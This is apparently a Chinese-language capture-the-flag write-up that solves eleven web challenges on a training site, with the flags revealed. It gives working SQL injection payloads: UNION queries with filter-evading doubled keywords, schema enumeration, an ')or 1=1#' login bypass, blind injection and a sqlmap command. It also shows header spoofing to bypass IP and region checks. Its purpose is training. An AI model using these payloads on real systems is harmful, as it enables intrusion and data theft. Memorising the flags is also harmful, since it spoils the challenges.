WEB CTF 西普学院
1.菊花
http://ctf1.simplexue.com/web/6/
提示:
Please make sure you have installed .net framework 9.9!
用burp拦截,修改user-agent为Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9),下面的注入均在这个条件下进行
id=1 提示hacker:welcome to simplexue CTF
id=4提示hacker: don’t try again
id=0/**/ununionion/**/seselectlect/**/1,user(),database()
用户名和数据库名称:root@cuit-092a2b258a inject
<span style="font-size:14px;">id=0/**/ununionion/**/seselectlect/**/1,username,userpapassss/**/ffromrom/**/aadmindmin/**/limit/**/0,1--</span>
simplexue: flag is SimCTF{xuectf}
2.Forbidden
http://ctf1.simplexue.com/basic/header/
提示:
You don't have permission to access /on this server.
Make sure you are in HongKong
用burp拦截,修改为Accept-Language:zh-hk即可>KEY:123JustUserAGent
3.头有点大
http://ctf1.simplexue.com/web/1/index.asp?id=1
提示:
You don't have permission to access / on this server.
Make sure you are in the region of England and browsing this site with Internet Explorer
用burp拦截
修改user-agent为Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9)
Accept-Language:en-gb
The key is:HTTpH34der
4.请输入密码
http://ctf1.simplexue.com/basic/js/index.asp
用burp拦截
得到JAVAscript
<script type="text/javascript">
document.οncοntextmenu=function(){return false};
var a,b,c,d,e,f,g;
a = 3.14;
b = a * 2;
c = a + b;
d = c / b + a;
e = c - d * b + a;
f = e + d /c -b * a;
g = f * e - d + c * b + a;
a = g * g;
a = Math.floor(a);
function check(){
if(document.getElementById("txt").value==a){
return true;
}else{
alert("密码错误");
return false;
}
}
</script>
写C算出:
#include<stdio.h>
int main()
{
float a,b,c,d,e,f,g;
a = 3.14;
b = a * 2;
c = a + b;
d = c / b + a;
e = c - d * b + a;
f = e + d /c -b * a;
g = f * e - d + c * b + a;
a = g * g;
printf("%f",a);
return 0;
}
运算结果:424178.562500 输入:424178 弹出key=> @#$JSisagoodtool@#$
5.这个看起来有点简单
http://ctf5.simplexue.com/8/index.php?id=1
id=1'
id=1 and 1=1
id=1 and 1=2 判断是sql注入
id=1 order by 2 两个字节
id=1 union select 1,2 回显2
version(): 5.0.45-community-nt
database(): my_db
user(): phpsql@localhost
爆数据库:
and 1=2 union select 1,schema_name from information_schema.schemata limit 0,1
information_schema my_db
爆表:
and 1=2 union select 1,table_name from information_schema.tables where table_schema=0x6d795f6462 limit 0,1
news thiskey
爆字段:
and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x6d795f6462 limit 0,1
id content k0y
爆内容:
and 1=2 union select 1,k0y from thiskey
key=> whati0MyD9ldump
6.猫抓老鼠
http://ctf1.simplexue.com/basic/catch/
查看http发现 Content-Row: MTQ0ODU0MzEyNA== 填入 MTQ0ODU0MzEyNA== =>KEY: #WWWnsf0cus_NET#
7.程序员的问题
http://ctf1.simplexue.com/web/4/index.php
查看源代码:
<?phpif($_POST[user] && $_POST[pass]) {$conn = mysql_connect("*******", "****", "****");mysql_select_db("****") or die("Could not select database");if ($conn->connect_error) {die("Connection failed: " . mysql_error($conn)); } $user = $_POST[user]; $pass = md5($_POST[pass]);$sql = "select user from php where (user='$user') and (pw='$pass')"; $query = mysql_query($sql); if (!$query) {printf("Error: %s\n", mysql_error($conn));exit(); } $row = mysql_fetch_array($query, MYSQL_ASSOC); //echo $row["pw"];if($row['user']=="admin") {echo "<p>Logged in! Key: *********** </p>";}if($row['user'] != "admin") {echo("<p>You are not admin!</p>");} }?>
输入admin 提示 You are not admin! 于是想到闭合: 输入=> ')or 1=1# 得到 Key: WWW_SIMPLEXUE_COM
8.what a fuck!这是什么鬼东西?
http://ctf5.simplexue.com/DUTCTF/1.html
有点晕,想到js加密,于是copy下来加上<script> </script> 弹出 Ihatejs
9.貌似有点难
http://ctf8.simplexue.com/phpaudit/
<?php
function GetIP(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))
$cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
$cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))
$cip = $_SERVER["REMOTE_ADDR"];
else
$cip = "0.0.0.0";
return $cip;
}
$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";
}
else{
echo "错误!你的IP不在访问列表之内!";
}
?>
http协议:
用burp拦截 加入 X-Forwarded-For: 1.1.1.1 伪造IP为: 1.1.1.1 => Key is http_client
10.进来就给你想要的
http://ctf1.simplexue.com/web/1/index.asp?id=1
这题是找后台:
输入admin 查看源代码提示 =>呵呵,思路是对的哈,但是不在这儿。想想谁的权利最大
输入system =>KEY: "!!!WellDoneBrother!"
11.看起来有点难
http://ctf1.simplexue.com/basic/inject/
这题是盲注题
输入用户名:admin,密码随意,然后提交
提示:登录失败,错误的用户名和密码
然后这么玩:
http://ctf1.simplexue.com/basic/inject/index.php?admin=admin'and (ascii(substr(database(),1,1))=97) %23&pass=admin&action=login
注:
ascii(str):把字符串转换为ascii码;substr(str,star,length)/substring(str,star,length):截取字符串(str字符串,star启始位置,length长度)
得到数据库:test
然后替换dabases();得到所有数据
注:这题过滤了select,用selselectect替换
用sqlmap这么来:
sqlmap.py -u "http://ctf1.simplexue.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --data "admin=&pass=" -D test --table
WEB CTF 西普学院相关推荐
- 西普学院逆向writeup ---------你会吗??
西普学院逆向writeup ---------你会吗?? --------跳跳龙 明天我们学校就要ctf比赛,深夜前10几分钟正好解了一道逆向题,是西普学院的,昨天,在小强的提醒下,也解了一道,今天就 ...
- 常熟理工php实验三_西普学院(实验吧)Web题解
1.你能跨过去吗? Key Words:XSS 根据提示考察XSS,看给出的链接需要的是编解码 http://www.test.com/NodeMore.jsp?id=672613&page= ...
- 西普学院web题总结
一.XSS 1.你能跨过去吗 题目已经明确提示是XSS,给了一个url:http://www.test.com/NodeMore.jsp?id=672613&page=2&pageCo ...
- 西普学院Crypto之先有鸡还是先有蛋
密文:Ijm,lo 3wsdr4 6tghu7 起初看到这个密文那是百思不得其解啊....各种解密都试了 什么栅栏凯撒组合啊... 后来想起有一篇writeup....于是默默的看了下键盘,果然是这样 ...
- 西普学院 writeup 逆向工程 该题不简单
----------跳跳龙 逆向的话主要就是IDA和OD的混合使用.两者各有优势,不过这道题用IDA就够了,而且OD的话貌似还调试不了,貌似加了保护. IDA逆向的结果如下:IDA对windowsAP ...
- 西普学院Crypto之摩擦摩擦
密文:.-- . .-.. -.-. --- -- . - --- -..- .. .--. ..- -..- ..- . -.-- ..- .- -. 一看就是Morse加密嘛,直接用JPK秒杀 结 ...
- 【西普实验吧】求解!
求解!分值:10 来源: 西普学院难度:易参与人数:3497人Get Flag:251人答题人数:286人解题通过率:88% 密文xztiofwhf是用仿射函数y=5x+11加密得到的 解题链接: 通 ...
- 西普教育:发挥高校示范引领作用 助力新工科建设
贵阳2018年7月23日电 /美通社/ -- 2018年7月23日,由西普教育承办的"新工科·新教育·新生态"高峰论坛在贵阳召开.2017-2018年,西普教育共计申报教育部产学合 ...
- 既往出现中性粒细胞减少的患者可以重新应用依那西普
原文 译文 Clin Rheumatol. 2011 Aug 5. [Epub ahead of print] Re-challenge with Etanercept in patients wit ...
最新文章
- java中什么是空指针异常_java中空指针异常的问题,是怎么回事?请看代码
- Apache软件历史版本下载地址
- 图灵访谈系列之八:对话归隐的大师——Donald E. Knuth(高德纳)
- JavaBean的get、set方法生成器
- JAVA错误:无法从静态上下文中引用非静态变量 this
- Linux(3)--防火墙
- 奥南朵 | 21天提升幸福感正念冥想
- ibatis mysql 配置文件详解_MyBatis配置文件详解
- UITextView(文本视图) 学习之初体验
- 软件工程-可行性分析
- 大势至监控服务器共享文件系统,大势至局域网共享文件监控NAS文件设置的方法...
- Python 基于sympy模块求极值 导数 偏导
- 【锐捷】DHCP配置
- Intent中putExtra()方法用法
- 房贷又降,不买!还能降
- 在android中在屏幕密度为160,在 android 中,在屏幕密度为160时,1pt 大概等于多少sp...
- 计算机睡眠之后无法唤醒,电脑进入睡眠状态后无法唤醒一直黑屏,该如何处理...
- 键盘是计算机最常用的输入设备之一
- 微分算子法 求微分方程特解 (超简单)
- python获取邮件并转为pdf
热门文章
- Anaconda创建、激活、退出、删除环境及管理环境中的包相关命令——最新全面直观版
- python列表是可变对象吗_Python可变对象和不可变对象
- jmeter并发测试简介
- 1836 永真公式的验证
- 服务器配置(未启用)修改,配置没有启动服务器服务怎么办
- 华为平板可以安装python_10 个可以在平板电脑上使用的 Python 编辑器
- 利用RVM与FastDeploy实现高效视频绿幕抠像:挽救视频剪辑师的工作效率
- 关于不同版本aee db文件的抓取
- 深度学习2.1二分类(Binary Classification)
- AI语音技能云开发(天猫精灵技能)学习笔记(结营)